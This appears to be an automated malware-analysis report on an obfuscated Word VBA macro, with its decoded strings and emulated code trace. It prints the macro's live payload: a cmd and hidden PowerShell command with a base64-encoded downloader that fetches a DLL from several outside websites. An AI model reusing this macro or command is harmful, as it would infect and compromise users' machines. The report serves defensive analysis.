Len	Len(" x [ sh bx [ sh bcx [ sh bmx [ sh bdx [ sh b x [ sh bcx [ sh bmx [ sh bdx [ sh b x [ sh b/x [ sh bcx [ sh b x [ sh bmx [ sh b^x [ sh bsx [ sh b^x [ sh bgx [ sh b x [ sh b%x [ sh bux [ sh bsx [ sh bex [ sh brx [ sh bnx [ sh bax [ sh bmx [ sh bex [ sh b%x [ sh b x [ sh b/x [ sh bvx [ sh b x [ sh bWx [ sh box [ sh b^x [ sh brx [ sh bdx [ sh b x [ sh bex [ sh bxx [ sh bpx [ sh b^x [ sh bex [ sh brx [ sh bix [ sh bex [ sh bnx [ sh b^x [ sh bcx [ sh bex [ sh bdx [ sh b x [ sh bax [ sh bnx [ sh b x [ sh bex [ sh brx [ sh b^x [ sh brx [ sh box [ sh brx [ sh b x [ sh btx [ sh brx [ sh byx [ sh bix [ sh b^x [ sh bnx [ sh bgx [ sh b x [ sh btx [ sh box [ sh b x [ sh box [ sh bpx [ sh b^x [ sh bex [ sh bnx [ sh b x [ sh btx [ sh bhx [ sh b^x [ sh bex [ sh b x [ sh bfx [ sh bix [ sh b^x [ sh blx [ sh bex [ sh b.x [ sh b x [ sh b&x [ sh b x [ sh bpx [ sh b^x [ sh box [ sh bwx [ sh bex [ sh b^x [ sh brx [ sh bsx [ sh b^x [ sh bhx [ sh bex [ sh b^x [ sh blx [ sh blx [ sh b^x [ sh b x [ sh b-x [ sh bwx [ sh b x [ sh bhx [ sh bix [ sh b^x [ sh bdx [ sh bdx [ sh b^x [ sh bex [ sh bnx [ sh b x [ sh b-x [ sh b^x [ sh bex [ sh b^x [ sh bnx [ sh bcx [ sh b x [ sh b x [ sh b x [ sh b x [ sh b x [ sh b x [ sh b x [ sh b x [ sh b x [ sh b x [ sh b x [ sh b x [ sh b x [ sh b IAAx [ sh bgAFx [ sh bMAZx [ sh bQBUx [ sh bAC0x [ sh bAaQx [ sh bBUAx [ sh bEUAx [ sh bbQAx [ sh bgACx [ sh bgAIx [ sh bgB2x [ sh bAEEx [ sh bAUgx [ sh bBpAx [ sh bCIAx [ sh bKwAx [ sh biAGx [ sh bEAYx [ sh bgBMx [ sh bAGUx [ sh bAOgx [ sh bAwAx [ sh bGkAx [ sh bIgAx [ sh brACx [ sh bIAOx [ sh bQBmx [ sh bACIx [ sh bAKwx [ sh bAiAx [ sh bFoAx [ sh bYgAx [ sh biACx [ sh bkAIx [ sh bAAgx [ sh bACgx [ sh bAIAx [ sh bBbAx [ sh bFQAx [ sh bWQBx [ sh bwAEx [ sh bUAXx [ sh bQAox [ sh bACIx [ sh bAewx [ sh bAxAx [ sh bH0Ax [ sh bewAx [ sh byAHx [ sh b0Aex [ sh bwA0x [ sh bAH0x [ sh bAewx [ sh bA1Ax [ sh bH0Ax [ sh bewAx [ sh bwAHx [ sh b0Aex [ sh bwAzx [ sh bAH0x [ sh bAewx [ sh bA2Ax [ sh bH0Ax [ sh bIgAx [ sh bgACx [ sh b0ARx [ sh bgAgx [ sh bACcx [ sh bAVAx [ sh bBPAx [ sh bCcAx [ sh bLAAx [ sh bnAFx [ sh bMAWx [ sh bQBTx [ sh bAFQx [ sh bAZQx [ sh bAnAx [ sh bCwAx [ sh bJwBx [ sh bNACx [ sh b4ASx [ sh bQBvx [ sh bAC4x [ sh bAZAx [ sh bBpAx [ sh bCcAx [ sh bLAAx [ sh bnAFx [ sh bIAJx [ sh bwAsx [ sh bACcx [ sh bAcgx [ sh bBlAx [ sh bCcAx [ sh bLAAx [ sh bnAEx [ sh bMAJx [ sh bwAsx [ sh bACcx [ sh bAWQx [ sh bAnAx [ sh bCkAx [ sh bIAAx [ sh bgACx [ sh bkAIx [ sh bAAgx [ sh bADsx [ sh bAIAx [ sh bAgAx [ sh bCAAx [ sh bJABx [ sh b5AHx [ sh bcATx [ sh bQA5x [ sh bAG4x [ sh bAIAx [ sh bA9Ax [ sh bFsAx [ sh bdABx [ sh bZAFx [ sh bAARx [ sh bQBdx [ sh bACgx [ sh bAIgx [ sh bB7Ax [ sh bDUAx [ sh bfQBx [ sh b7ADx [ sh bAAfx [ sh bQB7x [ sh bADMx [ sh bAfQx [ sh bB7Ax [ sh bDIAx [ sh bfQBx [ sh b7ADx [ sh bQAfx [ sh bQB7x [ sh bADEx [ sh bAfQx [ sh bAiAx [ sh bCAAx [ sh bLQBx [ sh bGACx [ sh bAAJx [ sh bwBux [ sh bAEUx [ sh bAdAx [ sh bAuAx [ sh bHMAx [ sh bZQBx [ sh bSAFx [ sh bYAJx [ sh bwAsx [ sh bACcx [ sh bAZQx [ sh bBSAx [ sh bCcAx [ sh bLAAx [ sh bnAEx [ sh bkAbx [ sh bgBUx [ sh bACcx [ sh bALAx [ sh bAnAx [ sh bGkAx [ sh bQwBx [ sh bFAFx [ sh bAAbx [ sh bwAnx [ sh bACwx [ sh bAJwx [ sh bBtAx [ sh bGEAx [ sh bTgBx [ sh bBAEx [ sh bcAJx [ sh bwAsx [ sh bACcx [ sh bAUwx [ sh bBZAx [ sh bHMAx [ sh bdABx [ sh bFAEx [ sh b0ALx [ sh bgAnx [ sh bACkx [ sh bAIAx [ sh bAgAx [ sh bDsAx [ sh bIAAx [ sh bgACx [ sh bQAUx [ sh bwA0x [ sh bAGsx [ sh bANgx [ sh bB0Ax [ sh bHIAx [ sh bagAx [ sh b9ACx [ sh bQATx [ sh bgA2x [ sh bADkx [ sh bARwx [ sh bAgAx [ sh bCsAx [ sh bIABx [ sh bbAGx [ sh bMAax [ sh bABhx [ sh bAHIx [ sh bAXQx [ sh bAoAx [ sh bDMAx [ sh bMwAx [ sh bpACx [ sh bAAKx [ sh bwAgx [ sh bACQx [ sh bATwx [ sh bAyAx [ sh bF8Ax [ sh bUAAx [ sh b7ACx [ sh bQARx [ sh bwAxx [ sh bADQx [ sh bAUQx [ sh bA9Ax [ sh bCgAx [ sh bJwBx [ sh bVACx [ sh bcAKx [ sh bwAox [ sh bACcx [ sh bAMwx [ sh bAnAx [ sh bCsAx [ sh bJwAx [ sh b2AEx [ sh b4AJx [ sh bwApx [ sh bACkx [ sh bAOwx [ sh bAgAx [ sh bCQAx [ sh bMABx [ sh bJADx [ sh bkAZx [ sh bgB6x [ sh bAGIx [ sh bAOgx [ sh bA6Ax [ sh bCIAx [ sh bQwBx [ s) -> 21436
Part of subcall function Kfgztxaw46z@Uved9u320lyen: TORFFDHP
Part of subcall function Kfgztxaw46z@Uved9u320lyen: Paragraphs
Part of subcall function Kfgztxaw46z@Uved9u320lyen: Range
Part of subcall function Kfgztxaw46z@Uved9u320lyen: Range
Part of subcall function Kfgztxaw46z@Uved9u320lyen: UBound
Part of subcall function Kfgztxaw46z@Uved9u320lyen: iScJlw
Part of subcall function Kfgztxaw46z@Uved9u320lyen: MidB$
Part of subcall function Kfgztxaw46z@Uved9u320lyen: bIhNCID
Part of subcall function Kfgztxaw46z@Uved9u320lyen: Paragraphs
Part of subcall function Kfgztxaw46z@Uved9u320lyen: Range
Part of subcall function Kfgztxaw46z@Uved9u320lyen: Range
Part of subcall function Kfgztxaw46z@Uved9u320lyen: UBound
Part of subcall function Kfgztxaw46z@Uved9u320lyen: CWWHXGG
Part of subcall function Kfgztxaw46z@Uved9u320lyen: MidB$
Part of subcall function Kfgztxaw46z@Uved9u320lyen: nyozdGEMG
Part of subcall function Kfgztxaw46z@Uved9u320lyen: Paragraphs
Part of subcall function Kfgztxaw46z@Uved9u320lyen: Range
Part of subcall function Kfgztxaw46z@Uved9u320lyen: Range
Part of subcall function Kfgztxaw46z@Uved9u320lyen: UBound
Part of subcall function Kfgztxaw46z@Uved9u320lyen: zMbQG
Part of subcall function Kfgztxaw46z@Uved9u320lyen: MidB$
Part of subcall function Kfgztxaw46z@Uved9u320lyen: RgCBRi
Part of subcall function Kfgztxaw46z@Uved9u320lyen: Paragraphs
Part of subcall function Kfgztxaw46z@Uved9u320lyen: Range
Part of subcall function Kfgztxaw46z@Uved9u320lyen: Range
Part of subcall function Kfgztxaw46z@Uved9u320lyen: UBound
Part of subcall function Kfgztxaw46z@Uved9u320lyen: hBXXCY
Part of subcall function Kfgztxaw46z@Uved9u320lyen: MidB$
SDiGFGB
Paragraphs
Range
Range
UBound
OeKxDTJnB
MidB$
Create	SWbemObjectEx.Create("cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc IAAgAFMAZQBUAC0AaQBUAEUAbQAgACgAIgB2AEEAUgBpACIAKwAiAGEAYgBMAGUAOgAwAGkAIgArACIAOQBmACIAKwAiAFoAYgAiACkAIAAgACgAIABbAFQAWQBwAEUAXQAoACIAewAxAH0AewAyAH0AewA0AH0AewA1AH0AewAwAH0AewAzAH0AewA2AH0AIgAgAC0ARgAgACcAVABPACcALAAnAFMAWQBTAFQAZQAnACwAJwBNAC4ASQBvAC4AZABpACcALAAnAFIAJwAsACcAcgBlACcALAAnAEMAJwAsACcAWQAnACkAIAAgACkAIAAgADsAIAAgACAAJAB5AHcATQA5AG4AIAA9AFsAdABZAFAARQBdACgAIgB7ADUAfQB7ADAAfQB7ADMAfQB7ADIAfQB7ADQAfQB7ADEAfQAiACAALQBGACAAJwBuAEUAdAAuAHMAZQBSAFYAJwAsACcAZQBSACcALAAnAEkAbgBUACcALAAnAGkAQwBFAFAAbwAnACwAJwBtAGEATgBBAEcAJwAsACcAUwBZAHMAdABFAE0ALgAnACkAIAAgADsAIAAgACQAUwA0AGsANgB0AHIAagA9ACQATgA2ADkARwAgACsAIABbAGMAaABhAHIAXQAoADMAMwApACAAKwAgACQATwAyAF8AUAA7ACQARwAxADQAUQA9ACgAJwBVACcAKwAoACcAMwAnACsAJwA2AE4AJwApACkAOwAgACQAMABJADkAZgB6AGIAOgA6ACIAQwBSAGUAYQB0AGAARQBEAGkAcgBFAGAAYwBUAE8AUgBZACIAKAAkAEgATwBNAEUAIAArACAAKAAoACgAJwAyAE8AYgBMACcAKwAnAGkAJwArACcAcQAnACkAKwAnADgAbAAnACsAJwA1ACcAKwAnADgAJwArACgAJwAyACcAKwAnAE8AYgBFAGcAJwApACsAKAAnAG8AJwArACcAawA3AGUAaQAnACkAKwAoACcAMgBPACcAKwAnAGIAJwApACkAIAAtAEMAUgBlAHAATABBAGMARQAgACgAWwBDAGgAQQBSAF0ANQAwACsAWwBDAGgAQQBSAF0ANwA5ACsAWwBDAGgAQQBSAF0AOQA4ACkALABbAEMAaABBAFIAXQA5ADIAKQApADsAJABPADIAXwBZAD0AKAAoACcAVAAnACsAJwAzADUAJwApACsAJwBEACcAKQA7ACAAKAAgACAAZwBDAGkAIAAgAFYAQQBSAEkAQQBiAGwARQA6AHkAdwBtADkATgAgACkALgBWAGEAbAB1AGUAOgA6ACIAUwBFAGMAdQByAGAAaQBUAFkAcABgAFIAbwB0AGAAbwBDAG8AbAAiACAAPQAgACgAKAAnAFQAbAAnACsAJwBzACcAKQArACcAMQAyACcAKQA7ACQAUwA3ADcATgA9ACgAJwBBACcAKwAoACcAOAAxACcAKwAnAFcAJwApACkAOwAkAEcAcQBoADAAagBfAGIAIAA9ACAAKAAnAEQAJwArACgAJwA2ACcAKwAnADQATwAnACkAKQA7ACQAVwA4ADYATwA9ACgAKAAnAEMAJwArACcANAA3ACcAKQArACcARgAnACkAOwAkAE0AdABuADAANQB2AHIAPQAkAEgATwBNAEUAKwAoACgAJwB7ADAAfQAnACsAJwBMAGkAcQA4AGwANQA4AHsAMAB9ACcAKwAoACcARQBnACcAKwAnAG8AJwApACsAJwBrADcAJwArACcAZQBpAHsAMAB9ACcAKQAgAC0AZgAgAFsAQwBoAGEAcgBdADkAMgApACsAJABHAHEAaAAwAGoAXwBiACsAJwAuAGQAJwAgACsAIAAnAGwAbAAnADsAJABLADYAOQBXAD0AKAAoACcASAA4ACcAKwAnADkAJwApACsAJwBZACcAKQA7ACQAVABrADEAcQB3AHQAOQA9ACcAaAAnACAAKwAgACcAdAB0ACcAIAArACAAJwBwACcAOwAkAE8AeQBsAHgAMQBkAGMAPQAoACgAJwB4ACAAWwAnACsAJwAgAHMAJwArACcAaAAnACkAKwAnACAAYgAnACsAJwA6ACcAKwAnAC8AJwArACgAJwAvAG4AJwArACcAYQBkAHkAJwApACsAJwBzACcAKwAoACcAYQAnACsAJwAuAGMAJwApACsAJwBvAG0AJwArACgAJwAvACcAKwAnAHcAJwArACcAcAAnACsAJwAtAGMAbwBuAHQAZQAnACkAKwAnAG4AdAAnACsAJwAvAEEAJwArACgAJwBsAG0AJwArACcAZQB0ACcAKQArACcALwAnACsAJwAhACcAKwAoACcAeAAnACsAJwAgAFsAJwApACsAKAAnACAAcwBoACAAYgAnACsAJwA6AC8ALwBiACcAKwAnAG8AbwBtACcAKwAnAGEAcgBrACcAKQArACgAJwBlAHQAZQAnACsAJwByAC4AJwArACcAYwBvACcAKQArACgAJwBtACcAKwAnAC8AdwAnACkAKwAoACcAcAAtAGMAJwArACcAbwBuAHQAJwArACcAZQAnACkAKwAnAG4AdAAnACsAKAAnAC8AJwArACcANgAvACcAKQArACcAIQAnACsAKAAnAHgAIAAnACsAJwBbACAAcwBoACcAKQArACgAJwAgACcAKwAnAGIAOgAnACkAKwAnAC8ALwAnACsAKAAnAGMAcgBvAG8AJwArACcAawAnACsAJwBzAC0AdABhAHkAbABvAHIAJwApACsAKAAnAC4AYwAnACsAJwBvACcAKQArACcAbQAnACsAJwAvACcAKwAoACcAMQA2ACcAKwAnADcANgAnACkAKwAnADQANwAnACsAKAAnADAAOQA3ADMAJwArACcALwAxAC8AIQAnACsAJwB4ACcAKQArACcAIABbACcAKwAnACAAcwAnACsAJwBoACcAKwAnACAAJwArACcAYgA6ACcAKwAnAC8AJwArACgAJwAvAHcAJwArACcAaAAnACsAJwBpAHQAZQAnACkAKwAnAHQAJwArACcAaABlACcAKwAoACcAbQAnACsAJwBlAC4AJwApACsAJwB4AHkAJwArACgAJwB6AC8AJwArACcAdwBwAC0AYwBvAG4AJwArACcAdAAnACkAKwAoACcAZQBuAHQALwAnACsAJwBxACcAKQArACcAOABIACcAKwAoACcALwAhAHgAJwArACcAIABbACcAKwAnACAAcwBoACcAKQArACgAJwAgAGIAJwArACcAOgAnACkAKwAoACcALwAvAHIAJwArACcAZQB4ACcAKQArACgAJwAuAHQAYQAnACsAJwBzACcAKwAnAG0AaQByACcAKQArACgAJwBhACcAKwAnAGcAcgBvAHUAcAAuACcAKQArACgAJwBjAG8AbQAnACsAJwAvACcAKQArACgAJwB3ACcAKwAnAHAALQAnACkAKwAnAGkAbgAnACsAKAAnAGMAJwArACcAbAB1AGQAJwArACcAZQBzAC8AdQBuADYARwAvACcAKwAnACEAeAAgACcAKQArACgAJwBbACAAJwArACcAcwBoACAAYgA6ACcAKwAnAC8ALwAnACkAKwAnAHIAJwArACcAYQBiACcAKwAoACcAaQAnACsAJwBlAGkALgAnACkAKwAoACcAZgB1ACcAKwAnAG4ALwAnACkAKwAnAGUAaQAnACsAJwBkAGwAJwArACgAJwAtAHIAZQBjAG8AbgBzACcAKwAnAGkAJwArACcAZAAnACkAKwAnAGUAJwArACgAJwByAGEAJwArACcAdABpACcAKQArACgAJwBvAG4ALQBiAHMAJwArACcAMwBsACcAKwAnAHUALwAnACkAKwAoACcAZgBlACcAKwAnAG8AJwApACsAJwBPAGkAJwArACgAJwBBAE8ALwAnACsAJwAhACcAKQArACgAJwB,,) -> 0
O4diqcx_e7ge
Soumelol3sb_6v
WFlaEdEJF
Paragraphs
Range
Range
UBound
fAEnDfCC
MidB$

Strings	Decrypted Strings
"sadsaccc"
"sasdsacc"
"sadsaccc"
"sasdsacc"
"sasdsacc"
"sasdsacc"
"sadsaccc"
"sasdsacc"
"sadsaccc"
"sasdsacc"
"sasdsacc"
"sasdsacc"
"x [ sh bpx [ sh b"
"x [ sh brox [ sh bx [ sh bcex [ sh bsx [ sh bsx [ sh bx [ sh b"
"sadsaccc"
"sasdsacc"
"sadsaccc"
"sasdsacc"
"sasdsacc"
"sasdsacc"
"x [ sh b:wx [ sh bx [ sh binx [ sh b3x [ sh b2x [ sh b_x [ sh b"
"sadsaccc"
"sasdsacc"
"sadsaccc"
"sasdsacc"
"sasdsacc"
"sasdsacc"
"wx [ sh binx [ sh bmx [ sh bgmx [ sh btx [ sh bx [ sh b"
"sadsaccc"
"sasdsacc"
"sadsaccc"
"sasdsacc"
"sasdsacc"
"sasdsacc"
"x [ sh bx [ sh b"
"sadsaccc"
"sasdsacc"
"sadsaccc"
"sasdsacc"
"sasdsacc"
"sasdsacc"
"sadsaccc"
"sasdsacc"
"sadsaccc"
"sasdsacc"
"sasdsacc"
"sasdsacc"
"sadsaccc"
"sasdsacc"
"sadsaccc"
"sasdsacc"
"sasdsacc"
"sasdsacc"
"sadsaccc"
"sasdsacc"
"sadsaccc"
"sasdsacc"
"sasdsacc"
"sasdsacc"
"sadsaccc"
"sasdsacc"
"sadsaccc"
"sasdsacc"
"sasdsacc"
"sasdsacc"
"sadsaccc"
"sasdsacc"
"sadsaccc"
"sasdsacc"
"sasdsacc"
"sasdsacc"

Line	Instruction	Meta Information
2	Function Ljahi4yh66g9t6oax()
3	Goto kkRMkYKwF	executed
4	Set oLvRsDgW = QjrbGoAT	QjrbGoAT
5	Dim QfiVIAehH, SJgnG, pUQjDD as Long
6	Dim DaucBFEHV as Word.Paragraph
7	Dim BukCBE() as Byte
8	For Each DaucBFEHV in Nre_13r__v1meabhr2.Paragraphs	Paragraphs
9	BukCBE = DaucBFEHV.Range	Range
10	dscc = "sadsaccc" & DaucBFEHV.Range	Range
11	SJgnG = UBound(BukCBE) - 1	UBound
12	QfiVIAehH = 0
13	Set DgoBQDE = ArvQXC	ArvQXC
14	Do Until SJgnG > SJgnG
15	If BukCBE(SJgnG) = 46 Or SJgnG = SJgnG Then
16	dscc = "sasdsacc" & (QfiVIAehH / 2) + 1 & " to " & (SJgnG / 2) + 1 & MidB$(BukCBE, QfiVIAehH + 1, SJgnG - QfiVIAehH + 3)	MidB$
17	QfiVIAehH = SJgnG + 2
18	Endif
19	SJgnG = SJgnG + 2
20	Loop
21	Next	Paragraphs
21	kkRMkYKwF:
23	skuwd = Jy5bao1vbuy3ey + Nre_13r__v1meabhr2.Content + C8lfxjyro41	Jy5bao1vbuy3ey Content C8lfxjyro41
26	Goto vQDCUDCB
27	Set RLhdX = GTerTpDH	GTerTpDH
28	Dim gRutBJw, dbkQgsAA, CmglGAD as Long
29	Dim EKKiJE as Word.Paragraph
30	Dim DkDVE() as Byte
31	For Each EKKiJE in Nre_13r__v1meabhr2.Paragraphs	Paragraphs
32	DkDVE = EKKiJE.Range	Range
33	dscc = "sadsaccc" & EKKiJE.Range	Range
34	dbkQgsAA = UBound(DkDVE) - 1	UBound
35	gRutBJw = 0
36	Set rIkmCk = pcKfwB	pcKfwB
37	Do Until dbkQgsAA > dbkQgsAA
38	If DkDVE(dbkQgsAA) = 46 Or dbkQgsAA = dbkQgsAA Then
39	dscc = "sasdsacc" & (gRutBJw / 2) + 1 & " to " & (dbkQgsAA / 2) + 1 & MidB$(DkDVE, gRutBJw + 1, dbkQgsAA - gRutBJw + 3)	MidB$
40	gRutBJw = dbkQgsAA + 2
41	Endif
42	dbkQgsAA = dbkQgsAA + 2
43	Loop
44	Next	Paragraphs
44	vQDCUDCB:
46	wjnsc = "x [ sh bpx [ sh b"
47	Hq2nbtpkjzz = "x [ sh brox [ sh bx [ sh bcex [ sh bsx [ sh bsx [ sh bx [ sh b"
48	Goto rnekAzHd
49	Set eJQhi = iNtVAIDc	iNtVAIDc
50	Dim tuwnUlI, VmouN, dGuTI as Long
51	Dim UODhfECCP as Word.Paragraph
52	Dim onDpQWW() as Byte
53	For Each UODhfECCP in Nre_13r__v1meabhr2.Paragraphs	Paragraphs
54	onDpQWW = UODhfECCP.Range	Range
55	dscc = "sadsaccc" & UODhfECCP.Range	Range
56	VmouN = UBound(onDpQWW) - 1	UBound
57	tuwnUlI = 0
58	Set lckOJI = CNURGFVBp	CNURGFVBp
59	Do Until VmouN > VmouN
60	If onDpQWW(VmouN) = 46 Or VmouN = VmouN Then
61	dscc = "sasdsacc" & (tuwnUlI / 2) + 1 & " to " & (VmouN / 2) + 1 & MidB$(onDpQWW, tuwnUlI + 1, VmouN - tuwnUlI + 3)	MidB$
62	tuwnUlI = VmouN + 2
63	Endif
64	VmouN = VmouN + 2
65	Loop
66	Next	Paragraphs
66	rnekAzHd:
68	U29c1_kuq199izyc54 = "x [ sh b:wx [ sh bx [ sh binx [ sh b3x [ sh b2x [ sh b_x [ sh b"
69	Goto QxJDiLDHH
70	Set StGIEBvBr = bHcuF	bHcuF
71	Dim dmUsACgD, fLrHD, jOsZcJgCh as Long
72	Dim yJLUe as Word.Paragraph
73	Dim moLoGCFdJ() as Byte
74	For Each yJLUe in Nre_13r__v1meabhr2.Paragraphs	Paragraphs
75	moLoGCFdJ = yJLUe.Range	Range
76	dscc = "sadsaccc" & yJLUe.Range	Range
77	fLrHD = UBound(moLoGCFdJ) - 1	UBound
78	dmUsACgD = 0
79	Set zQEvCNI = FzldATHyG	FzldATHyG
80	Do Until fLrHD > fLrHD
81	If moLoGCFdJ(fLrHD) = 46 Or fLrHD = fLrHD Then
82	dscc = "sasdsacc" & (dmUsACgD / 2) + 1 & " to " & (fLrHD / 2) + 1 & MidB$(moLoGCFdJ, dmUsACgD + 1, fLrHD - dmUsACgD + 3)	MidB$
83	dmUsACgD = fLrHD + 2
84	Endif
85	fLrHD = fLrHD + 2
86	Loop
87	Next	Paragraphs
87	QxJDiLDHH:
89	Pmm9cm8qolvp = "wx [ sh binx [ sh bmx [ sh bgmx [ sh btx [ sh bx [ sh b"
90	Goto NmDEB
91	Set pEAiGKqHg = SJlnAGABP	SJlnAGABP
92	Dim IXzyVV, fagdu, ehgssJrG as Long
93	Dim DObJX as Word.Paragraph
94	Dim PgRZHO() as Byte
95	For Each DObJX in Nre_13r__v1meabhr2.Paragraphs	Paragraphs
96	PgRZHO = DObJX.Range	Range
97	dscc = "sadsaccc" & DObJX.Range	Range
98	fagdu = UBound(PgRZHO) - 1	UBound
99	IXzyVV = 0
100	Set IBVrh = OdqhFz	OdqhFz
101	Do Until fagdu > fagdu
102	If PgRZHO(fagdu) = 46 Or fagdu = fagdu Then
103	dscc = "sasdsacc" & (IXzyVV / 2) + 1 & " to " & (fagdu / 2) + 1 & MidB$(PgRZHO, IXzyVV + 1, fagdu - IXzyVV + 3)	MidB$
104	IXzyVV = fagdu + 2
105	Endif
106	fagdu = fagdu + 2
107	Loop
108	Next	Paragraphs
108	NmDEB:
110	K1dvo8hcenmvdt8 = "x [ sh bx [ sh b" + Mid(Application.Name, 60 / 10, 1) + "x [ sh bx [ sh b"	Mid Name Application
111	Goto Qidjl
112	Set ebgcAE = VTAHFoBxb	VTAHFoBxb
113	Dim XzAMGG, sHgJaG, FarLoFz as Long
114	Dim bSozuu as Word.Paragraph
115	Dim FaeuQIDH() as Byte
116	For Each bSozuu in Nre_13r__v1meabhr2.Paragraphs	Paragraphs
117	FaeuQIDH = bSozuu.Range	Range
118	dscc = "sadsaccc" & bSozuu.Range	Range
119	sHgJaG = UBound(FaeuQIDH) - 1	UBound
120	XzAMGG = 0
121	Set woJbJABu = hpETwA	hpETwA
122	Do Until sHgJaG > sHgJaG
123	If FaeuQIDH(sHgJaG) = 46 Or sHgJaG = sHgJaG Then
124	dscc = "sasdsacc" & (XzAMGG / 2) + 1 & " to " & (sHgJaG / 2) + 1 & MidB$(FaeuQIDH, XzAMGG + 1, sHgJaG - XzAMGG + 3)	MidB$
125	XzAMGG = sHgJaG + 2
126	Endif
127	sHgJaG = sHgJaG + 2
128	Loop
129	Next	Paragraphs
129	Qidjl:
131	Vbjlntbb7x3ac9o = Pmm9cm8qolvp + K1dvo8hcenmvdt8 + U29c1_kuq199izyc54 + wjnsc + Hq2nbtpkjzz
132	Goto bxlKBdJEV
133	Set tJnnSICuC = SDQTYAih	SDQTYAih
134	Dim iezxKGCjf, oofPFJE, ELodJ as Long
135	Dim CazGpHEDF as Word.Paragraph
136	Dim xIuBj() as Byte
137	For Each CazGpHEDF in Nre_13r__v1meabhr2.Paragraphs	Paragraphs
138	xIuBj = CazGpHEDF.Range	Range
139	dscc = "sadsaccc" & CazGpHEDF.Range	Range
140	oofPFJE = UBound(xIuBj) - 1	UBound
141	iezxKGCjf = 0
142	Set KxJIEXq = jhPGFGFEE	jhPGFGFEE
143	Do Until oofPFJE > oofPFJE
144	If xIuBj(oofPFJE) = 46 Or oofPFJE = oofPFJE Then
145	dscc = "sasdsacc" & (iezxKGCjf / 2) + 1 & " to " & (oofPFJE / 2) + 1 & MidB$(xIuBj, iezxKGCjf + 1, oofPFJE - iezxKGCjf + 3)	MidB$
146	iezxKGCjf = oofPFJE + 2
147	Endif
148	oofPFJE = oofPFJE + 2
149	Loop
150	Next	Paragraphs
150	bxlKBdJEV:
152	G_k1zbg91ofvz3bhf = Kfgztxaw46z(Vbjlntbb7x3ac9o)
153	Goto mwFcDF
154	Set qTPUJB = afoME	afoME
155	Dim KTfCJ, kwlTHAH, dAZzFm as Long
156	Dim hOPLcHJ as Word.Paragraph
157	Dim QkClFj() as Byte
158	For Each hOPLcHJ in Nre_13r__v1meabhr2.Paragraphs	Paragraphs
159	QkClFj = hOPLcHJ.Range	Range
160	dscc = "sadsaccc" & hOPLcHJ.Range	Range
161	kwlTHAH = UBound(QkClFj) - 1	UBound
162	KTfCJ = 0
163	Set hOyBkq = fDCQH	fDCQH
164	Do Until kwlTHAH > kwlTHAH
165	If QkClFj(kwlTHAH) = 46 Or kwlTHAH = kwlTHAH Then
166	dscc = "sasdsacc" & (KTfCJ / 2) + 1 & " to " & (kwlTHAH / 2) + 1 & MidB$(QkClFj, KTfCJ + 1, kwlTHAH - KTfCJ + 3)	MidB$
167	KTfCJ = kwlTHAH + 2
168	Endif
169	kwlTHAH = kwlTHAH + 2
170	Loop
171	Next	Paragraphs
171	mwFcDF:
173	Set Jfxhwoyn1nrrxfe = CreateObject(G_k1zbg91ofvz3bhf)	CreateObject("winmgmts:win32_process") executed
174	Goto oYpISX
175	Set PLgbDBG = izsoCGvJ	izsoCGvJ
176	Dim BzqWhVTIQ, bLGZEYcz, wyNRtEF as Long
177	Dim sswIGoWgh as Word.Paragraph
178	Dim PSrcCvsEO() as Byte
179	For Each sswIGoWgh in Nre_13r__v1meabhr2.Paragraphs	Paragraphs
180	PSrcCvsEO = sswIGoWgh.Range	Range
181	dscc = "sadsaccc" & sswIGoWgh.Range	Range
182	bLGZEYcz = UBound(PSrcCvsEO) - 1	UBound
183	BzqWhVTIQ = 0
184	Set lPkcE = KLDUkJGJS	KLDUkJGJS
185	Do Until bLGZEYcz > bLGZEYcz
186	If PSrcCvsEO(bLGZEYcz) = 46 Or bLGZEYcz = bLGZEYcz Then
187	dscc = "sasdsacc" & (BzqWhVTIQ / 2) + 1 & " to " & (bLGZEYcz / 2) + 1 & MidB$(PSrcCvsEO, BzqWhVTIQ + 1, bLGZEYcz - BzqWhVTIQ + 3)	MidB$
188	BzqWhVTIQ = bLGZEYcz + 2
189	Endif
190	bLGZEYcz = bLGZEYcz + 2
191	Loop
192	Next	Paragraphs
192	oYpISX:
194	njcnja = Mid(skuwd, (1 + 1 + 1 + 1), Len(skuwd))	Mid Len(" x [ sh bx [ sh bcx [ sh bmx [ sh bdx [ sh b x [ sh bcx [ sh bmx [ sh bdx [ sh b x [ sh b/x [ sh bcx [ sh b x [ sh bmx [ sh b^x [ sh bsx [ sh b^x [ sh bgx [ sh b x [ sh b%x [ sh bux [ sh bsx [ sh bex [ sh brx [ sh bnx [ sh bax [ sh bmx [ sh bex [ sh b%x [ sh b x [ sh b/x [ sh bvx [ sh b x [ sh bWx [ sh box [ sh b^x [ sh brx [ sh bdx [ sh b x [ sh bex [ sh bxx [ sh bpx [ sh b^x [ sh bex [ sh brx [ sh bix [ sh bex [ sh bnx [ sh b^x [ sh bcx [ sh bex [ sh bdx [ sh b x [ sh bax [ sh bnx [ sh b x [ sh bex [ sh brx [ sh b^x [ sh brx [ sh box [ sh brx [ sh b x [ sh btx [ sh brx [ sh byx [ sh bix [ sh b^x [ sh bnx [ sh bgx [ sh b x [ sh btx [ sh box [ sh b x [ sh box [ sh bpx [ sh b^x [ sh bex [ sh bnx [ sh b x [ sh btx [ sh bhx [ sh b^x [ sh bex [ sh b x [ sh bfx [ sh bix [ sh b^x [ sh blx [ sh bex [ sh b.x [ sh b x [ sh b&x [ sh b x [ sh bpx [ sh b^x [ sh box [ sh bwx [ sh bex [ sh b^x [ sh brx [ sh bsx [ sh b^x [ sh bhx [ sh bex [ sh b^x [ sh blx [ sh blx [ sh b^x [ sh b x [ sh b-x [ sh bwx [ sh b x [ sh bhx [ sh bix [ sh b^x [ sh bdx [ sh bdx [ sh b^x [ sh bex [ sh bnx [ sh b x [ sh b-x [ sh b^x [ sh bex [ sh b^x [ sh bnx [ sh bcx [ sh b x [ sh b x [ sh b x [ sh b x [ sh b x [ sh b x [ sh b x [ sh b x [ sh b x [ sh b x [ sh b x [ sh b x [ sh b x [ sh b IAAx [ sh bgAFx [ sh bMAZx [ sh bQBUx [ sh bAC0x [ sh bAaQx [ sh bBUAx [ sh bEUAx [ sh bbQAx [ sh bgACx [ sh bgAIx [ sh bgB2x [ sh bAEEx [ sh bAUgx [ sh bBpAx [ sh bCIAx [ sh bKwAx [ sh biAGx [ sh bEAYx [ sh bgBMx [ sh bAGUx [ sh bAOgx [ sh bAwAx [ sh bGkAx [ sh bIgAx [ sh brACx [ sh bIAOx [ sh bQBmx [ sh bACIx [ sh bAKwx [ sh bAiAx [ sh bFoAx [ 